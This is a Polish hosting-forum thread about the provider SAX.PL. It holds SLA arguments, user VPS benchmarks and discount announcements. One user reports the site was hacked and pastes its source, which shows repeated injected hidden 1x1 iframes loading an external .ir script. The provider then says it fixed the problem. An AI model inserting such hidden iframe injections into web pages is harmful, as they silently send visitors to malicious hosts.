Skocz do zawartości

Polecane posty

@tgx - starego misia na sztuczny miód nie nabierzesz :) pokaż swoje zabezpieczenia na SLA 99,9 w BH :)

 

 

Proszę

 

- 2 routery bgp w vrrp

- 2 agregaty prądotwórcze

- dwie niezależne linie zasilające

- Łącza które sprawdzić możesz tutaj: http://bgp.he.net/AS198414#_asinfo prowadzone różnymi fizycznymi liniami

- Administrator 24h na miejscu gotowy do reakcji w ciągu minut

- kluczowe usługi w HA

 

Nawet przy tym zapewnienie 99,9 w miesiącu jest wyzwaniem

 

 

Tobie pozostaje jedynie ticket/email, czasami telefon i czekanie i gwarantujesz reakcję, ba rozwiązanie problemu w ciągu minut? ;)

 

 

Jest wiele firm na tym forum, które inwestują duże środki w zapewnienie redundancji, opracowują różne procedury tak by systematycznie podnosić jakość i gwarancję, z duży rozmysłem podnoszą gwarancje o każdą setną część procenta opierając to na własnych możliwościach a Wy co? Wrzucacie na start 4 dziewiątki bo tak ładnie wygląda na tle konkurencji? ;)

 

Zapytaj się dostawcy jakie masz gwarancje SLA na sprzęt, skoreluj to gwarancjami reakcji (pewnie NMT) zobaczysz wówczas bzdurę, którą umieściłeś na stronie.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

@tgx trochę za mocno moim zdaniem,a jak już tak chcesz "jeździć" po firmie bo z całym szacunkiem inaczej posta twojego nie mogę odebrać to bardzo bym prosił o podanie choć imienia które zapewne Panu Kamilowi by się przydało do identyfikacji jeśli miałby w przyszłości np. plany przeniesienia się do SLA 99,9 % to chciałby się skontaktować z Panem a nie "tegieiksem". Chyba że możesz mieć przez to problemy to przepraszam najmocniej.

 

@sax na razie startujecie więc spokojnie miesiąc "życie" wszystko wyklaruje. I polecam tylko dyskusje które po przeczytaniu potencjalny user tego forum przeczyta i pomyśli sobie "hmm ciekawe też się wypowiem" i nie wdawać się w bzdurne dyskusje które tracą czas w temacie który powinniście pucować jak się da w końcu to potencjalni klienci ;)

  • Upvote 2

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

@tgx - dzięki - my też nie trzymamy serwerów w piwnicy ;) i na prawde nie musisz się martwić o to w jaki sposób nasze maszyny zabezpieczają się przed ewentualnymi problemami - tym bardziej, że z tego co wiem to nie jesteś naszym Klientem. Zakończmy więc proszę ten dialog bo on nic nie wnosi do tej dyskusji. Jako dostarczyciel usług hostingowych pragniemy z wszystkich sił zapewnić jak największy uptime naszym Klientom.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

No ok, chciałeś bym pokazał co mamy to Ci napisałem, na przyszłość jak nie chcesz ciągnąć dyskusji to nie pytaj

 

 

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Zakupiłem usługę VPS w sax.pl i tak na szybko co mogę napisać ...?!

 

1) support, reakcja natychmiastowa

2) szybki podgląd/test VPS

 

CPU model :  Intel(R) Xeon(R) CPU E5-1650 0 @ 3.20GHz
Number of cores : 4
CPU frequency :  3199.700 MHz
Total amount of ram : 6144 MB
Total amount of swap : 2048 MB
      
Download speed from CacheFly: 27,0MB/s
Download speed from Leaseweb, Haarlem, NL: 63,9MB/s

I/O speed :  282 MB/s

dd if=/dev/zero of=test bs=64k count=16k conv=fdatasync; unlink

test16384+0 przeczytanych recordów
16384+0 zapisanych recordów
skopiowane 1073741824 bajty (1,1 GB), 3,50257 s, 307 MB/s
Początek dobry, co dalej pokaże czas wraz z wzrostem klientów == obciążeniem maszyn.

 

pozdro

voti

Edytowano przez voti (zobacz historię edycji)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Zakupiłem serwer VPS na test - PRO DUE-VPS.

VPS chodzi bardzo sprawnie - pewnie dlatego że maszyna jest nie zapełniona :D Trzeba poczekać aż zapełnią maszynę - wtedy zobaczymy :P

Support bardzo szybko odpisuje, jest miły i da się z nimi dogadać ;)

Jedynie miałem problemy z płatnością i panelem. Z płatnością to pewnie wina systemu Platnosci-Online (bo wtedy im strona padła), ale gdy ich serwis wstał i moja płatnośc została zaakceptowana to padł panel WHMCS.

 

Na teraz to tyle.

 

Pozdrawiam,

Poplop

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Testuję serwer

PRO TRE-VPS

Jest naprawdę stabilny, 0 problemów jak narazie. Mam nadzieje że ich się nie doczekam :)

Przy tym dobra cena, lokalizacja Francja idealnie odpowiada :)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Jest naprawdę stabilny, 0 problemów jak narazie

Nie ma to jak mówić o stabilności po 5 godzinnym uptime..

  • Upvote 3

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Sztywniak, krawat, fejmer i biznesman(woman) - wyluzujcie, poluzujcie żyłkę, nie spamujcie. Będzie, jak będzie. Coś nagle każdy zaczął chcieć być Steve'm Jobsem i wcielić się w światowego wizjonera, oraz przewidywać przyszłość? Nie, nie jestem powiązany z ich'że usługami, boś to młoda marka, a dżam iść tam, gdzie się fajnie jest. Wiem, chaotycznie - nie chcę mieć tej samej zbieżności co dwoje panowie, wiem, to jest dziwne, heh. Upadnie firma? Nic nowego. Ceny będą wyższe? Nic nowego. Coś będzie gorzej hulało? Nic nowego. Po co powtarzać się w kółko, to jest nudne. :(

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Za każdym razem jak coś nowego wychodzi KAZDY, ALE TO KAŻDY szuka bez sensu jakiś durnych haków tylko po to, aby obsmarować jakaś firmę.

Dlaczego?

Bo jest młoda i daje co daje.

Chcecie się dowiedzieć jak to wygląda to sobie weźcie po usłudze i wtedy polonizujcie.

 

  • Upvote 1

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Za każdym razem jak coś nowego wychodzi KAZDY, ALE TO KAŻDY szuka bez sensu jakiś durnych haków tylko po to, aby obsmarować jakaś firmę.

Wrzucenie wszystkich do jednego wora nie jest chyba najlepszym pomysłem bo zdarzają się ludzie którzy nie napiszą złego słowa.

 

Dlaczego?

Bo jest młoda i daje co daje.

Chcecie się dowiedzieć jak to wygląda to sobie weźcie po usłudze i wtedy polonizujcie.

Pierwszym i mniej ważnym czynnikiem jest to że to forum jest o tematyce hostingu i zrzesza duża grupę ludzi z branży którym powiedzmy szczerze nie jest na rękę żadna konkurencja, a tym bardziej taka która wchodzi na rynek z tańszą ofertą bo wiadomo chce złapać klienta. Zwłaszcza tym starym lisom którzy w branży siedzą od lat.

 

Drugim i najważniejszym czynnikiem jest zazdrość. Żyjemy w czasach konsumpcjonizmu i gonitwie za pieniądzem. Jeśli nie chcesz by cokolwiek Ci zazdroszczono to znajdź sobie prace na taśmie i nie wychylaj się. Natomiast jeśli masz jakiś pomysł i zaczniesz się nim dzielić z innymi to bardzo szybko przekonasz się ilu masz tak naprawdę dobrych znajomych, a ilu zacznie pluć jadem lub co gorsza podkradnie Ci pomysł i dopiero zacznie pluć. Dlatego też pojawiają się takie opinie i to nie tylko tutaj, ale prawie wszędzie na każdym kroku można spotkać taką "zawodową uprzejmość". Mentalność dużej części społeczeństwa opiera się na podstawowej zasadzie zgnoić, oczernić i na końcu wyśmiać że się ch**** nie udało i że biznes padł, bo nikt nie może mieć lepiej niż On.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Obecnie zakończyliśmy przenosiny do nowej dla nas serwerowni dlatego mamy nadzieję, że jakość ustatkuje się na wysokim poziomie a nasi Klienci będą usatysfakcjonowani z naszej obsługi kont www.

 

Tak jak pisałem w innym temacie na tą chwilę wycofaliśmy się ze sprzedaży VPS na jakiś czas. Możliwym jest, że niebawem wrócimy już do tego tematu odpowiednio przygotowani techniczne i prawnie - dzięki czemu będziemy próbowali odbudować naszą wpadkę przy tym odpowiednią jakością zadowolić nawet najbardziej oczekującego Klienta.

 

Przypominam także, że nasza oferta 50% rabatu dla pierwszego zamówienia pierwotnie miała być do końca września - jednak została ona przedłużona do odwołania. Dlatego zapraszam do skorzystania z kodu: SAX2013 wszystkich nowych Klientów.

 

Z wyrazami Szacunku,

SAX.PL

  • Upvote 1

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Witamy serdecznie w Nowym Roku 2014.

Mamy nadzieję, że Święta udało się Wam spędzić w bardzo dobrym nastroju, a zabawę Sylwestrową będziecie jeszcze wspominać przy okazji spotkań okolicznościowych.

 

Pragniemy poinformować, że postanowiliśmy dla Nowych Klientów przedłużyć okres świętowania bezterminowo! Dla wszystkich nowych Klientów zniżka -50% jest nadal aktywna, z tym, że kod zniżkowy niewiele się zmienił: SAX2014.

 

Pozdrawiamy i życzymy samych sukcesów w życiu osobistym jak i w życiu zawodowym.

 

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

witam - korzystał ktoś z oferty tej firmy jeśli chodzi o konta www ? - i mógłby coś napisać, bo nie wiem czy warto, a ceny mają niezłe.

z góry dzięki

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Chciałem zamówić teraz konto www a tu nagle na stronie głównej błędy i ciężko się ładuje klikam w panel aby narpiew się zarejestrować a tu informacja:

The file /home/saxpl/domains/sax.pl/public_html/panel/index.php is corrupted.

 

po źródle patrze

<iframe src="http://news.adsabouts.ir/go.php" width="1" height="1"></iframe>The file /home/saxpl/domains/sax.pl/public_html/panel/index.php is corrupted.



wracając do strony głównej patrze na źródło a tu na początku :

print "<iframe src=\"http://news.adsabouts.ir/go.php\" width=\"1\" height=\"1\"></iframe>";<iframe src="http://news.adsabouts.ir/go.php" width="1" height="1"></iframe>print "<iframe src=\"http://news.adsabouts.ir/go.php\" width=\"1\" height=\"1\"></iframe>";print "<iframe src=\"http://news.adsabouts.ir/go.php\" width=\"1\" height=\"1\"></iframe>";print "<iframe src=\"http://news.adsabouts.ir/go.php\" width=\"1\" height=\"1\"></iframe>";print "<iframe src=\"http://news.adsabouts.ir/go.php\" width=\"1\" height=\"1\"></iframe>";<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>
Serwery www, hosting, domeny - SAX.PL
</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
Najwidoczniej widać że ktoś coś na broił i wsadził jakieś reklamy z zagranicy a wczoraj jeszcze wszystko dobrze działało dobrze że nie kupiłem usługi bo jak to włam to szkoda gadać co z danymi klientów i zasobów klientów będzie powtórka mintshost gdzie dane wyciekły do intenrnetu

 

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość nrm

^^ Serwis stoi na WordPressie więc niestety jest narażony na masę automatycznych ataków ;(

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Faktycznie coś się do nas wczoraj przylepiło, ale udało się to szybko sprzątnąć i pozabezpieczać. Także Tomku śmiało możesz zamawiać ;)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Nie chce być złośliwy, ale jeżeli na stronie providera hostingowego występują takie rzeczy, to trudno sobie wyobrazić jaki jest poziom zabezpieczeń dla klientów. Ja wordpressów używam od kilku lat na wielu stronach i jeszcze nigdy nie miałem takich cyrków na stronie. Jeżeli system jest chociaż w podstawowym zakresie zabezpieczony i monitorowany w działaniu coś takiego nie powinno mieć miejsca.

 

Powodów takiego stanu rzeczy może być wiele i niekoniecznie związanych z dziurami Wordpressa.

Edytowano przez L4.net.pl (zobacz historię edycji)
  • Upvote 1

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Jakis czas temy wysypal sie calkowicie dzial poswiecony VPS'om - mega awaria, brak pracownikow mogacych ogarnac zainstniale problemy co spowodowalo wylaczenie w/w uslugi z oferty tej firmy.

 

Teraz dla odmiany problemy ktore opisywal Tomasz889.

 

Czy firma ktorej poswiecony jest watek nie powinna zrezygnowac ze swiadczenia wszelkich uslug?

 

Edytowano przez almighty (zobacz historię edycji)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

almighty - wszystkie nasze usługi działają w pełni prawidłowo i nasi Klienci nie zgłaszają problemów, żadnego także wycieku danych nie było. Jeżeli chodzi o problem przedstawiony przez Tomasz889 to był on związany z szablonem na którym działa strona więc tutaj też kwestia została już rozwiązana i poprawiona. Przepraszamy wszystkich za niedogodności z tym związane.

 

Dziękujemy przede wszystkim za zdanie osób, które nie korzystają z naszych usług, a są zawsze na posterunku (dzięki Wam, reagujemy jeszcze szybciej) - jednocześnie zapraszamy do testów naszego hostingu.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Dzieki Sax.pl ale po tym co przeczytalem bede trzymac sie od Was jak najdalej.

 

Rozumiem, ze awarie sie zdarzaja - ale bez przesady.

 

Nie wiem jak mozna doprowadzic do sytuacji w ktorej zaliczacie mega wpadke z VPS'ami (takze z danymi klientow), nie macie pracownikow ktorzy mogliby (szybko) ogarnac temat a na koncu okazuje sie, ze sytuacja Was przerosla i ze swojej oferty usuwacie w/w opcje.

 

Dla mnie masakra i tyle.

 

Jak biore za cos pieniadze to usluga (zawsze!) jest na najwyzszym poziomie. Jak cos zle dziala - nie uruchamiam uslugi w ogole albo udostepniam i nie biore za to kasy. Proste.

 

Nie ma u mnie czegos takiego, ze uruchamiam jakas usluge, dziala kiepsko (biore za to kase) w miedzyczasie zas usuwam usterki.

Edytowano przez almighty (zobacz historię edycji)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Jak biore za cos pieniadze to usluga (zawsze!) jest na najwyzszym poziomie.

 

 

Najwyższy poziom może być tylko w Twoim mniemaniu, a dla innych może być poniżej średniej. Nie masz też co cwaniakować. Różne wpadki w branży hostingowej zdarzają się nawet gigantom, dlatego można poruszyć temat, ale nie ma co wieszać kosy na firmie i niech działa dalej szlifując jeszcze bardziej swój fach. Ja osobiście wierzę, że każdy błąd będzie podwaliną do zwiększenia jakości w przyszłości :)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

almighty - absolutnie masz do tego prawo. Wracając do Twojej wypowiedzi odpowiem na nią po raz ostatni bo na ten moment nie dotyczy ona naszej bezpośredniej oferty, jeżeli chciałbyś prowadzić z nami dialog zapraszamy bezpośrednio na PW lub mail. VPSy były przede wszystkim darmowe - testowe i one nie działały - więc Klienci za te usługi nie zapłacili, wszystkie dane były do pobrania (żaden z Klientów z tego nie skorzystał) - więc de facto - mamy takie same zdanie o usługach ;-)

 

Zapraszam do dyskusji także Klientów, którzy mają u nas konta hostingowe typu shared, ponieważ obecnie takie usługi przede wszystkim świadczymy, niemniej jednak ponownie dziękuje za opinie osób które nie mają u nas żadnych usług - na prawdę bierzemy sobie je do serca i mamy nadzieję, że jakość naszych usług z dnia na dzień staje się coraz lepsza.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Bądź aktywny! Zaloguj się lub utwórz konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto

Zarejestruj nowe konto, to proste!

Zarejestruj nowe konto

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się


×